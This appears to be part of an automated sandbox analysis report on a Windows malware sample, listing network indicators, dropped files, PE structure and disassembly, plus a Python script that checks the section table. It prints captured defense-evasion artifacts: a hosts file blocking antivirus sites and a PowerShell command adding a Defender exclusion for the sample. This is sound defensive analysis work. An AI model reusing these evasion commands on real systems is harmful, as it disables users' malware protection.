• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data
• VT rate limit hit for: file.exe
Time | Type | Description
• 14:37:59 | API Interceptor | 26x Sleep call for process: powershell.exe modified
• 14:38:12 | API Interceptor | 4x Sleep call for process: WMIC.exe modified
IP matches in other analyses (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
208.95.112.1
• oIGNK22EVW.exe | malicious | Unknown | ip-api.com/json/
• 5WTfUvmHO0.exe | malicious | Unknown | ip-api.com/json/
• 4sN88dMzwC.exe | malicious | Unknown | ip-api.com/json/
• JEr70NrBvQ.exe | malicious | Unknown | ip-api.com/json/
• 8wLgIg588m.exe | malicious | Unknown | ip-api.com/json/
• DmI602ZFyp.exe | malicious | Unknown | ip-api.com/json/
• oIGNK22EVW.exe | malicious | Unknown | ip-api.com/json/
• 5WTfUvmHO0.exe | malicious | Unknown | ip-api.com/json/
• JEr70NrBvQ.exe | malicious | Unknown | ip-api.com/json/
• 4sN88dMzwC.exe | malicious | Unknown | ip-api.com/json/
51.210.106.44
• oIGNK22EVW.exe | malicious | Unknown | -
• 5WTfUvmHO0.exe | malicious | Unknown | -
• 4sN88dMzwC.exe | malicious | Unknown | -
• JEr70NrBvQ.exe | malicious | Unknown | -
• 8wLgIg588m.exe | malicious | Unknown | -
• DmI602ZFyp.exe | malicious | Unknown | -
• oIGNK22EVW.exe | malicious | Unknown | -
• 5WTfUvmHO0.exe | malicious | Unknown | -
• JEr70NrBvQ.exe | malicious | Unknown | -
• 4sN88dMzwC.exe | malicious | Unknown | -
Domain matches in other analyses (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
w.tundara.dev
• 5WTfUvmHO0.exe | malicious | Unknown | 51.210.106.44
• 4sN88dMzwC.exe | malicious | Unknown | 51.210.106.44
• JEr70NrBvQ.exe | malicious | Unknown | 51.210.106.44
• 8wLgIg588m.exe | malicious | Unknown | 51.210.106.44
• DmI602ZFyp.exe | malicious | Unknown | 51.210.106.44
• 5WTfUvmHO0.exe | malicious | Unknown | 51.210.106.44
• JEr70NrBvQ.exe | malicious | Unknown | 51.210.106.44
• 4sN88dMzwC.exe | malicious | Unknown | 51.210.106.44
• 8wLgIg588m.exe | malicious | Unknown | 51.210.106.44
• DmI602ZFyp.exe | malicious | Unknown | 51.210.106.44
b.tundara.dev
• oIGNK22EVW.exe | malicious | Unknown | 51.210.106.44
• 5WTfUvmHO0.exe | malicious | Unknown | 51.210.106.44
• 4sN88dMzwC.exe | malicious | Unknown | 51.210.106.44
• JEr70NrBvQ.exe | malicious | Unknown | 51.210.106.44
• 8wLgIg588m.exe | malicious | Unknown | 51.210.106.44
• DmI602ZFyp.exe | malicious | Unknown | 51.210.106.44
• oIGNK22EVW.exe | malicious | Unknown | 51.210.106.44
• 5WTfUvmHO0.exe | malicious | Unknown | 51.210.106.44
• JEr70NrBvQ.exe | malicious | Unknown | 51.210.106.44
• 4sN88dMzwC.exe | malicious | Unknown | 51.210.106.44
ip-api.com
• oIGNK22EVW.exe | malicious | Unknown | 208.95.112.1
• 5WTfUvmHO0.exe | malicious | Unknown | 208.95.112.1
• 4sN88dMzwC.exe | malicious | Unknown | 208.95.112.1
• JEr70NrBvQ.exe | malicious | Unknown | 208.95.112.1
• 8wLgIg588m.exe | malicious | Unknown | 208.95.112.1
• DmI602ZFyp.exe | malicious | Unknown | 208.95.112.1
• oIGNK22EVW.exe | malicious | Unknown
                                                                                                                            • 208.95.112.1
                                                                                                                            5WTfUvmHO0.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            JEr70NrBvQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
                                                                                                                            4sN88dMzwC.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 208.95.112.1
Match          Associated Sample Name / URL                          Detection   Threat Name        Context
OVH FR         Demande de proposition du Module Ultra Inc.malz.pdf   malicious   Unknown            144.217.96.200
               Demande de proposition du Allesi Telecom.pdf          malicious   Unknown            66.70.227.242
               Driving a supply chain planning evaluation.eml        malicious   Lure-BasedAttack   94.23.161.19
               oIGNK22EVW.exe                                        malicious   Unknown            51.210.106.44
               5WTfUvmHO0.exe                                        malicious   Unknown            51.210.106.44
               4sN88dMzwC.exe                                        malicious   Unknown            51.210.106.44
               JEr70NrBvQ.exe                                        malicious   Unknown            51.210.106.44
               8wLgIg588m.exe                                        malicious   Unknown            51.210.106.44
               DmI602ZFyp.exe                                        malicious   Unknown            51.210.106.44
               oIGNK22EVW.exe                                        malicious   Unknown            51.210.106.44
TUT-AS US      oIGNK22EVW.exe                                        malicious   Unknown            208.95.112.1
               5WTfUvmHO0.exe                                        malicious   Unknown            208.95.112.1
               4sN88dMzwC.exe                                        malicious   Unknown            208.95.112.1
               JEr70NrBvQ.exe                                        malicious   Unknown            208.95.112.1
               8wLgIg588m.exe                                        malicious   Unknown            208.95.112.1
               DmI602ZFyp.exe                                        malicious   Unknown            208.95.112.1
               oIGNK22EVW.exe                                        malicious   Unknown            208.95.112.1
               5WTfUvmHO0.exe                                        malicious   Unknown            208.95.112.1
               JEr70NrBvQ.exe                                        malicious   Unknown            208.95.112.1
               4sN88dMzwC.exe                                        malicious   Unknown            208.95.112.1
                                                                                                                            No context
                                                                                                                            No context
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):64
                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                            Malicious:false
                                                                                                                            Preview:@...e...........................................................
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                            File Type:ASCII text, with very long lines (65479)
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):108252
                                                                                                                            Entropy (8bit):6.000529922966145
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:HA0YE97Bg0q74hSPvXPPPQRt5F4wpeDvT:HADENtjSfgc
                                                                                                                            MD5:BDE5D3193EC921B33FA89DD80C4B70AE
                                                                                                                            SHA1:FB6CD06AFD3558BEB1BCBCDF7BBDCA1DEC732DFC
                                                                                                                            SHA-256:7B24B50628ADB77F59DC6195FB0B05C21539C2F06C077B103216D0DE9FE353AA
                                                                                                                            SHA-512:7B61F8E6F32EB2C351A8673DB9DBD4BA46AB6BFB0ECC882175ED91535BDD89153A1C050ADBFF2794301BCB15D47291546C7EC5BFEB5D5AC86F920AA11324E765
                                                                                                                            Malicious:false
                                                                                                                            Preview:2024/11/26 14:37:58 COUCOU.2024/11/26 14:38:06 ANTIDEBUG.2024/11/26 14:38:11 w4mwXbkp3ZwSilFcWNU42zW6GWK6E3YhpFu82w1Vs1HqliCK5LyQ6WbaUpKMIZXbzHR5TuhyYUkVz4NyBdYKVsjYGLmZLVpnRitNpFICgnMb6cnOGlCgDzUEBOHFmvStOaV3VwM5ZFOrV1IzXbhdLXpRQxOk5aWPQndmuP7jnrEoIjr8QODIV13yoYJixiMS24PFQZCEIUypfSsGMBFWdyC4gvWLS4vmAABqtKl6NJLpz1WqxNkGJprKQfipkIDepa0wc0OdLiR4IIF62ISPzEXlfyI92cZhefzMJiSogtidyCK80pBAbvbVyvh3XqttsGE4BSOjDxcaKCvw3e1XgJFKZSXLoOG3jObsiZ2XkUIk1SJahSKO3flWo6kskIC0vrJFg030gyPENsZjsfDk2dQkGO0EpRsCSaGCM9pmhDhJCf7ZV3FtzmmBec4yDOYXQxdf5SPczbDQfudddwNEL5ulxmbv10mJzDp66baomN0diMuSsl5vKUWBbe2zjeB4lwOMJdEdPPb2IDsf47OV5A7YEqyBwsbKoRjmKdRXUAzSivkDqd2zrNGNKzSPAKsPCQ1Wlq64gHo5ZXtyWciPu6SHjYoj3VGj4oou54fHzaWDAX5ExT6We0nDgxHUHLVPHOnZX6yjla4wE6nJ9YpKMFTEcZHp0ihwskwLJGpCEZswSWQrRD2CjSGTgFaid7JDO4KlIMUf8FxAZejPZxlzrcEh6zcgLT1uMJybA00bsTL2minK5Hq67eKSrIUhHuG97u3oKfknlFmwwXkPmDfCNr881KkghXAK1ItHCQ63sPff4PX8DSvvvAsrYej6sKvtTY1Edt42VT93f9flXSHpuEG04GEHoDhv5jPS32UcNziRRhrr5U1yGsIigfFgQGcxkYISA8aAu3pdfmjueMqOCMs2R4n
                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                            File Type:PNG image data, 1280 x 1024, 8-bit/color RGB, non-interlaced
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):437039
                                                                                                                            Entropy (8bit):7.996846254185691
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:12288:zjD4GODKh07sMozuP8QKM6U1H/cJJifWKxQR:v0WGJozCEM6aUJJ4ZxU
                                                                                                                            MD5:46E375D0EB54F40DD8743DA07077BB73
                                                                                                                            SHA1:B613B0E068B97D0AADF5748C05FDAD5C3A956CFF
                                                                                                                            SHA-256:7AEFFD9A4540F90556B08FF0E023CA371801CEBF56C1E3E7684549882EA34A03
                                                                                                                            SHA-512:7DFCB6ECBD1C57BF4961FD5D0B905DA4D48D78530DDFDE5207D1E974369F876429C4CCABCDFBEF574119EF7C057F45570AB7C05BEC6B3C4176224F51B0AED879
                                                                                                                            Malicious:false
                                                                                                                            Preview:.PNG........IHDR.............1.c.....IDATx....-WY&:gU...>I..$. 6Hx..Q...t...<.....^L.....W...b.v.U.K....*(:D.PQA......T.$..c......$..^kU..........k..Y..v..Y.|T.....H..4.K..q..k\}.......v.7..n....G.....j".P"_...Z....(.R......Y...D...^.[.4.kX.(....G.[=+..3..!....55..<k.l..y.D;..lg<.......VZx}.I.......A.7.......y...s...]O......T.|..._...O.....#.#....s...#.A.....Z..9..f.l{|py.M..a2....(Zs..|....b.EQ..W.vr.....H........."G..2.L..rS.~\.5. ......s..<.(J.D.Tor.gd..,.9..)....4M....|K......f.$I.4..8.1t|/.].38..$Gd...u...3......N.8R.x}w.vc.........tK.r. NT/.R.O......4M......my<...4ME...(PLM.a.. k@..Rib...8.&.I....3.A..W...h?I.cL.`.....i.."..c.4...I..F..B..%..I.y.eL...2\Y).$?...e..!.r...i..C.$..WF..../.H1..........+.].,.LMl..e...A.$.;..H...\(..:.cU.F.......9...K.:..ki...g<.C.....c...X.......,.s_*..s...6|.=..]..#C.....(x. C..5.........7K..NQ..r;..)@.cu...A......h".Wm....t..`#-.\..o..A...H....0.....|_\.x.(....[70....`E`...... Z...U..0..
                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                            File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2165
                                                                                                                            Entropy (8bit):4.522303506272206
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:vDZhyoZWM9rU5fFcqwUYi1iBopn2g2+oGSVy2w23c4Zezwd0/a7S4qqBLE97aFsL:vDZEurK9UUlcBsn2g2+lSw2w23c4ZezT
                                                                                                                            MD5:BD87D7EA7B5DBD74CC0B0E38477F6079
                                                                                                                            SHA1:63C28862A5D0052F2425A8B45AC0F66572A02F33
                                                                                                                            SHA-256:EB97F9588DFFD94BC3B06EAED77751593F32F9E0D09A9B7868746AB16E7F45F1
                                                                                                                            SHA-512:1DD93CD24870D9716980B38145A1DC23F8EFB5DB93DB9D5223C1D0984CD8E064C6C99B6833F7066392BA79D887AC37F0BA3D8D5CD657B56967D51A2836C52AF0
                                                                                                                            Malicious:true
                                                                                                                            Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost..0.0.0.0 virustotal.com.0.0.0.0 www.virustotal.com.0.0.0.0 avast.com.0.0.0.0 www.avast.com.0.0.0.0 totalav.com.0.0.0.0 www.totalav.com.0.0.0.0 scanguard.com.0.0.0.0 www.scanguar
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):938
                                                                                                                            Entropy (8bit):4.923311029897411
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:nt0vndauY/ko+3bdh5wt0gVuY/ko+3bdh5m:nticV+3OtZV+3U
                                                                                                                            MD5:19337BA4C4D41BAAD6889F3C15D74656
                                                                                                                            SHA1:9EBDBE84E3C10C18F0CF4FD41B07D69EFDBE79BF
                                                                                                                            SHA-256:38C62D71037FF4484A8463BC98F0A800C46E3F53E4F517BC7AFED80EAE22898F
                                                                                                                            SHA-512:53209FCD982F91BFC92408954CF2FFA1CD9A13B9DAA9398F9A39F048E59315FD91E079016FD556E438802B586E8E9A50AEE6CE8606FE91FEE10C8641E1861898
                                                                                                                            Malicious:false
                                                                                                                            Preview:Add-MpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: ..ConfigListExtension...At line:1 char:1..+ Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], .. CimException.. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference.. ..Add-MpPreference : Operation failed with the following error: 0x%1!x!..At line:1 char:1..+ Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], .. CimException.. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference.. ..
                                                                                                                            File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                            Entropy (8bit):6.688564756632582
                                                                                                                            TrID:
                                                                                                                            • Win64 Executable (generic) (12005/4) 74.95%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 12.51%
                                                                                                                            • DOS Executable Generic (2002/1) 12.50%
                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                                                            File name:file.exe
                                                                                                                            File size:26'987'008 bytes
                                                                                                                            MD5:9096f57fa44b8f20eebf2008a9598eec
                                                                                                                            SHA1:42128a72a214368618f5693df45b901232f80496
                                                                                                                            SHA256:f4e2eeea7e5db511bfca33ffd1e26bce5d72e2a381e84bf3700938eb404f7934
                                                                                                                            SHA512:ad29f94040532ab78679ec9e50d58d8ccef3f99d5ab53ef7c654527b9b2634da4c44375b2ca2d54a83d1dd1e0fa9b1d1a13241ffe0328bea07740166927521b2
                                                                                                                            SSDEEP:393216:sN/jPM/y7B3Zdp1uPGiSPWw1JDte23oZohZ:sN/wq7Vfp1uVS+w162Ph
                                                                                                                            TLSH:86478D43F8A10AE4E0AE8534C6759266BB717C684F3467D76B90F7242F7BBC09A79340
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................'.|.....................@..........................................`... ............................
                                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                                            Entrypoint:0x1400013d0
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x140000000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                            TLS Callbacks:0x409470a0, 0x1, 0x40947070, 0x1
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:6
                                                                                                                            OS Version Minor:1
                                                                                                                            File Version Major:6
                                                                                                                            File Version Minor:1
                                                                                                                            Subsystem Version Major:6
                                                                                                                            Subsystem Version Minor:1
                                                                                                                            Import Hash:775059ed24d97a19ee581b6a1a412da2
                                                                                                                            Instruction
                                                                                                                            dec eax
                                                                                                                            sub esp, 28h
                                                                                                                            dec eax
                                                                                                                            mov eax, dword ptr [01950B45h]
                                                                                                                            mov dword ptr [eax], 00000001h
                                                                                                                            call 00007FEA5D34DE9Fh
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            dec eax
                                                                                                                            add esp, 28h
                                                                                                                            ret
                                                                                                                            nop dword ptr [eax]
                                                                                                                            dec eax
                                                                                                                            sub esp, 28h
                                                                                                                            dec eax
                                                                                                                            mov eax, dword ptr [01950B25h]
                                                                                                                            mov dword ptr [eax], 00000000h
                                                                                                                            call 00007FEA5D34DE7Fh
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            dec eax
                                                                                                                            add esp, 28h
                                                                                                                            ret
                                                                                                                            nop dword ptr [eax]
                                                                                                                            dec eax
                                                                                                                            sub esp, 28h
                                                                                                                            call 00007FEA5DC9519Ch
                                                                                                                            dec eax
                                                                                                                            cmp eax, 01h
                                                                                                                            sbb eax, eax
                                                                                                                            dec eax
                                                                                                                            add esp, 28h
                                                                                                                            ret
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            dec eax
                                                                                                                            lea ecx, dword ptr [00000009h]
                                                                                                                            jmp 00007FEA5D34E0D9h
                                                                                                                            nop dword ptr [eax+00h]
                                                                                                                            ret
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop word ptr [eax+eax+00000000h]
                                                                                                                            nop word ptr [eax+eax+00h]
                                                                                                                            jmp dword ptr [eax]
                                                                                                                            inc edi
                                                                                                                            outsd
                                                                                                                            and byte ptr [edx+75h], ah
                                                                                                                            imul ebp, dword ptr [esp+20h], 203A4449h
                                                                                                                            and ah, byte ptr [eax+ebx*2+4Bh]
                                                                                                                            inc ecx
                                                                                                                            dec ecx
                                                                                                                            jne 00007FEA5D34E136h
                                                                                                                            push ebp
                                                                                                                            sub eax, 6758496Dh
                                                                                                                            push ecx
                                                                                                                            xor ch, byte ptr [ebp+33h]
                                                                                                                            xor dword ptr [eax], edi
                                                                                                                            jne 00007FEA5D34E131h
                                                                                                                            outsb
                                                                                                                            pop dx
                                                                                                                            jne 00007FEA5D34E138h
                                                                                                                            xor dh, byte ptr [78694C2Dh]
                                                                                                                            imul edx, dword ptr [edi+6Ch], 46h
                                                                                                                            aaa
                                                                                                                            jnc 00007FEA5D34E13Bh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x19f5000 | 0x259 | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x19f6000 | 0x2568 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1953000 | 0x3dc2c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x19fb000 | 0x25b08 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x1951b40 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x19f68d8 | 0x798 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
.text   0x1000           0x947ab0      0x947c00  f0aa1fcf38129e46eaca109450b1ae8d  unknown   unknown              unknown    unknown             IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data   0x949000         0x7921d0      0x792200  34b1a81203702778864a6295a080a48c  unknown   unknown              unknown    unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata  0x10dc000        0x876c50      0x876e00  aa147227f145c8c41bce7a2988318831  unknown   unknown              unknown    unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata  0x1953000        0x3dc2c       0x3de00   c5ca3e4258fb53de8ede214bb43fdf80  False     0.40912247474747476  data       6.016441234687043   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata  0x1991000        0x5068        0x5200    0869b2ee2ddae9743592e863fce9bd0a  False     0.09436928353658537  data       2.711309238841643   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss    0x1997000        0x5db80       0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                 IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata  0x19f5000        0x259         0x400     eb2f763a206fb0b331d62d7a404e906a  False     0.3837890625         data       3.7871484219967946  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata  0x19f6000        0x2568        0x2600    07571f01c91d851558dc531bed664e4a  False     0.30694901315789475  data       4.877429762045649   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT    0x19f9000        0x60          0x200     caf539b79007e315d8862108fd0ecd3d  False     0.068359375          data       0.3178744142480582  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls    0x19fa000        0x10          0x200     bf619eac0cdf3f68d496ea9344137e8b  False     0.02734375           data       0.0                 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc  0x19fb000        0x25b08       0x25c00   0802e413e11072c62a682edbf7b91551  False     0.1823972992549669   data       5.444999649956561   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
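The section table above is what drives the "more sections than normal" and "non-standard names" signatures, and it is also the place to check for packing (a section whose virtual size is far larger than its raw size, or with entropy close to 8) before trusting any static result. The script below is an added example, not part of the Joe Sandbox report: it encodes the eleven rows of this table as constructed input and runs the checks an analyst does by hand. The alignments (0x1000 section / 0x200 file), the section-count threshold, the entropy threshold and the list of "MSVC default" section names are assumptions; the report does not state which values its own signatures use.

```python
"""Consistency checks over a PE section table as printed in a sandbox report.

Added example; values below are transcribed from the report's section table,
thresholds and name lists are assumptions, not the sandbox's own rules.
"""
from dataclasses import dataclass
from typing import List, Optional

SECTION_ALIGNMENT = 0x1000      # assumed: SectionAlignment of the optional header
FILE_ALIGNMENT = 0x200          # assumed: FileAlignment of the optional header
SECTION_COUNT_THRESHOLD = 8     # assumed: above this, "more sections than normal"
HIGH_ENTROPY = 7.0              # assumed: typical packed/encrypted threshold

# Sections a plain MSVC build emits (assumed). Everything else is "non-standard";
# a .xdata/.bss/.edata/.idata/.CRT/.tls set is what the MinGW-w64 linker emits,
# which fits the cgo exports elsewhere in this report.
MSVC_DEFAULT_NAMES = {".text", ".rdata", ".data", ".pdata", ".rsrc", ".reloc"}


@dataclass(frozen=True)
class Section:
    name: str
    va: int            # RVA of the section
    vsize: int         # VirtualSize
    raw: int           # SizeOfRawData
    entropy: Optional[float]   # None where the report prints "unknown"
    uninit: bool = False       # IMAGE_SCN_CNT_UNINITIALIZED_DATA set


def align_up(x: int, a: int) -> int:
    return (x + a - 1) & ~(a - 1)


def check_layout(sections: List[Section]) -> List[str]:
    """Return human-readable findings; an empty list means the layout is consistent."""
    findings = []
    for i, s in enumerate(sections):
        if s.va % SECTION_ALIGNMENT:
            findings.append(f"{s.name}: VA {s.va:#x} not aligned to {SECTION_ALIGNMENT:#x}")
        if s.raw % FILE_ALIGNMENT:
            findings.append(f"{s.name}: raw size {s.raw:#x} not aligned to {FILE_ALIGNMENT:#x}")
        if i + 1 < len(sections):
            # Each section must start where the previous one ends, rounded up.
            expected = align_up(s.va + s.vsize, SECTION_ALIGNMENT)
            nxt = sections[i + 1]
            if nxt.va != expected:
                findings.append(f"{nxt.name}: VA {nxt.va:#x}, expected {expected:#x} after {s.name}")
        # .bss-style sections legitimately have raw size 0; anything else with a
        # virtual size well beyond its file bytes is room for code unpacked at run time.
        if not s.uninit and s.vsize > s.raw + SECTION_ALIGNMENT:
            findings.append(f"{s.name}: virtual size {s.vsize:#x} far exceeds raw size {s.raw:#x}")
        if s.entropy is not None and s.entropy >= HIGH_ENTROPY:
            findings.append(f"{s.name}: entropy {s.entropy:.2f} (possibly packed/encrypted)")
    return findings


def unusual_names(sections: List[Section]) -> List[str]:
    return [s.name for s in sections if s.name not in MSVC_DEFAULT_NAMES]


def too_many_sections(sections: List[Section]) -> bool:
    return len(sections) > SECTION_COUNT_THRESHOLD


# Transcribed from the report's section table (entropy "unknown" -> None).
SECTIONS = [
    Section(".text",  0x1000,    0x947ab0, 0x947c00, None),
    Section(".data",  0x949000,  0x7921d0, 0x792200, None),
    Section(".rdata", 0x10dc000, 0x876c50, 0x876e00, None),
    Section(".pdata", 0x1953000, 0x3dc2c,  0x3de00,  6.016441234687043),
    Section(".xdata", 0x1991000, 0x5068,   0x5200,   2.711309238841643),
    Section(".bss",   0x1997000, 0x5db80,  0x0,      0.0, uninit=True),
    Section(".edata", 0x19f5000, 0x259,    0x400,    3.7871484219967946),
    Section(".idata", 0x19f6000, 0x2568,   0x2600,   4.877429762045649),
    Section(".CRT",   0x19f9000, 0x60,     0x200,    0.3178744142480582),
    Section(".tls",   0x19fa000, 0x10,     0x200,    0.0),
    Section(".reloc", 0x19fb000, 0x25b08,  0x25c00,  5.444999649956561),
]

if __name__ == "__main__":
    for line in check_layout(SECTIONS) or ["layout consistent"]:
        print(line)
    print("non-MSVC section names:", unusual_names(SECTIONS))
    print("section count:", len(SECTIONS), "(above threshold)" if too_many_sections(SECTIONS) else "")
```

For this sample the layout check comes back clean: every section starts exactly where the previous one ends (rounded to 0x1000), raw sizes are 0x200-aligned, the only raw-size-0 section is the uninitialized .bss, and no section has packer-grade entropy (the three "unknown" rows are the ones large enough that the sandbox skipped the calculation, so treat them as unmeasured rather than low). What does stand out is the section set itself: six of the eleven names are MinGW-w64 conventions rather than MSVC ones, which is the real content behind the "non-standard names" signature.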
DLL                                     Import
